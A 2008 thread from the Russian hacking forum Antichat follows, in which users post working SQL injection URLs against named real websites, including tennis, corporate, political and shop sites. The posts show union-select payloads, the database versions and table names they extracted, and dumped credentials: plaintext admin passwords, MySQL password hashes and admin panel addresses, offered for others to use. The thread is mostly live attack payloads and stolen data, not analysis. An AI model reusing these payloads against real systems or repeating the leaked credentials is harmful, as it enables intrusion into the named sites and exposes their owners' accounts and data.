ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.03.2008, 17:44
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
рейтинг игроков в теннис
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'
перебераем таблы
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('plyrbioHTML','ContestInfo_bak','rankdates','SQLINJECTION','rankmast','RollingRank','sglbest14','PlayerEquip','sglbest14roll','sglmtchfact','PlayerEquip_backup','ClipBTournEntryPossibles','cntrymast','cntrymast_Latino','ContestInfo','dblbest14','dblbest14roll','dblno1plyr','dblrndrsl','dblrndrslXX','dbltrnrsl','dbltrnrslroll','dblwinstreak','dtproperties','DW_EventHistoryByTrnYearTrnNum','DW_SglRaceRankByCountry','emailtemp','ENTY_PlayerProperty'))
все лень было перебирать
Код:
plyrbioHTML',
'ContestInfo_bak',
'rankdates'
,'SQLINJECTION',
'rankmast','RollingRank',
'sglbest14','PlayerEquip',
'sglbest14roll','sglmtchfact',
'PlayerEquip_backup',
'ClipBTournEntryPossibles',
'cntrymast','cntrymast_Latino',
'ContestInfo',
'dblbest14',
'dblbest14roll',
'dblno1plyr','dblrndrsl',
'dblrndrslXX'
,'dbltrnrsl','dbltrnrslroll',
'dblwinstreak',
'dtproperties','DW_EventHistoryByTrnYearTrnNum',
'DW_SglRaceRankByCountry'
,'emailtemp'
,'ENTY_PlayerProperty
берем таблицу перебираем столбцы для примера plyrbioHTML
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='plyrbioHTML'AND+COLUMN_NAME+NOT+IN+('plyrnum','lastupdate','updateind','biotext'))--
находим нужный столец выводим напр plyrnum
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=1'+or+1=(SELECT+TOP+1+plyrnum+FROM+plyrbioHTML)--
получаем 'A001'
Куму нужно ишите админку просто честно лень было 
P.s там же в строке поиска фотографий Иньекция через POST параметр коу как удобней 
Последний раз редактировалось MaSter GeN; 10.03.2008 в 17:46..
|
|
|
10.03.2008, 18:20
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
microstar.ru
Код:
http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&kind=10
version() 5.0.37-log
user() microsta@localhost
database() msi
Код:
http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users
Выбираете какая именно из админок вам нужна)
Код:
http://microstar.ru/ssl/
к MSI WWW Admin admin:vscegths
dailygrill.com
Код:
http://www.dailygrill.com/details.php?loid=999+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18/*
version() 4.1.20
user() dailgrill@localhost
database() dailygrill
www.cameco.com
Код:
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7
version() 4.0.24-log
user() webuser@localhost
database() cameco
Код:
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user,0x3a,password),5,6,7+from+mysql.user
Код:
root:38d08178573a7e9a
webuser:
ripple:094af26d30f261b0
twc:6657738010cb81dd
riona_ca:63c907421a792a43
Код:
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user_name,0x3a,user_password),5,6,7+from+users+limit+0,1
admin:1112ff600dee3a15 - chicago
Последний раз редактировалось nex0; 10.03.2008 в 19:08..
|
|
|
|
10.03.2008, 18:41
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
http://fantasiasexshop.com.br/verSensualidade.php?id=99999'+union+select+1,2,VER SION(),4,5/*
VERSION: 5.0.41--log
USER: fantasiasexshop1@200.234.200.106
DATABASE: fantasiasexshop1
http://www.williamtopley.com/shop/showitem.php?id=99999+union+select+1,2,VERSION(),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17/*
VERSION: 4.1.22-standard
USER: williamt@localhost
DATABASE: williamt_wtdb
http://www.knitterspalette.com/shopping/knittingbags/index.php?id=99999+union+select+1,2,3,TABLE_NAME,5 ,6,7,8,9,10,11,12,13,14+FROM+INFORMATION_SCHEMA.TA BLES+limit+16,1/*
admin_module
admin_user_levels
admin_user_module
homepage
magazine
users
yarn
|
|
|
|
10.03.2008, 19:58
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
http://www.rhd.uz/forum_cont.php?uid=-99999+union+select+1,2,user(),version(),database()/*
USER: atumatu_rhd@217.147.30.68
VERSION: log 5.0.45
DATABASE: atumatu_rhd
|
|
|
|
11.03.2008, 09:14
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
www.tourtasmania.com PR4
Код:
http://tourtasmania.com/content.php?id=cygnet'+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7/*
justin_tourtas:4.1.20:justin_ttweb@localhost
стандартных таблиц нет
www.alkamae.com PR3
Код:
http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
5.0.45- community:alkamae_content:alkamae_admin121@localho st
Код:
http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,NAME,password,member_level),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
HEATHER:test:4
но в админку это не канает(
|
|
|
|
12.03.2008, 09:58
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
http://www.takayagolfcentre.com/
Код:
http://www.takayagolfcentre.com/gallery.php?album=3&image=-4+union+select+11111,concat_ws(0x3a,username,password)+from+users/*
(вывод в src картинки)
http://www.takayagolfcentre.com/admin/
admin:takaya07
avtorinok.ru
(есть в антибояне, но у меня с админскими правами для форума)
Код:
http://www.avtorinok.ru/news/news_firms.php?id=-890+union+select+1,2,3,4,5,6,7,8,9/*
http://www.avtorinok.ru/forum/
Andrey:welcome22
|
|
|
|
12.03.2008, 11:45
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
je0n
вот только то ифреймы на взломаные сайты ставить не надо что бы античатовцы вирусы хватали
|
|
|
|
12.03.2008, 13:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
жопс)
Код:
http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.tables/*&content_id=1
|
|
|
|
12.03.2008, 18:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от l1ght
жопс)
Код:
http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.tables/*&content_id=1
Я вообще-то аполитичен ,но всё должно быть по чесному:
_http://www.yavlinsky.ru/news/index.phtml?id=3520+AND+(version()+like+char(51,46 ,50,51,46,53,52))
версия 3.23.54
уязвим так-же поиск
Извращаться сильно не стал,но никто не скажет ,что ачат против ЛДПР
|
|
|
|
12.03.2008, 16:38
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
xakep.ru
http://www.xakep.ru/articles/Links/result.asp?tosearch=1=1)+and+(1=1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид